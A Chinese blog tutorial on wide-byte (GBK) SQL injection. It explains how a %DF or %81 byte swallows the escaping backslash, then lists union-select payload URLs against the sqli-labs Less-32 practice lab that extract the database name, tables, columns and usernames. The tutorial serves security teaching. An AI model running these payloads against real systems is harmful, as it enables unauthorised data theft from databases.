0
点赞
收藏
分享

微信扫一扫

MySQL注入 -- 宽字节注入


很多事情,原来努力了,也得不到满意的结果。。。

----  网易云热评

 

一、宽字节注入介绍

1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入

2、GBK编码表,%DF%5C正好组成( 運),所以会把\"吃掉",0X81-0XFE都可以

MySQL注入 -- 宽字节注入_mysql注入

二、实例演示

1、获取数据库名称

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+

MySQL注入 -- 宽字节注入_宽字节_02

2、获取数据库security的表

http://192.168.139.129/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 --+

MySQL注入 -- 宽字节注入_sql_03

3、获取下一个表

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1 --+

MySQL注入 -- 宽字节注入_宽字节_04

4、获取表名为users的字段名

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 limit 11,1--+

MySQL注入 -- 宽字节注入_sql_05

5、获取字段内容

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users limit 1,1 --+

MySQL注入 -- 宽字节注入_宽字节_06

 

禁止非法,后果自负

欢迎关注视频号:之乎者也吧

MySQL注入 -- 宽字节注入_宽字节_07


MySQL注入 -- 宽字节注入_宽字节_08

举报

相关推荐

0 条评论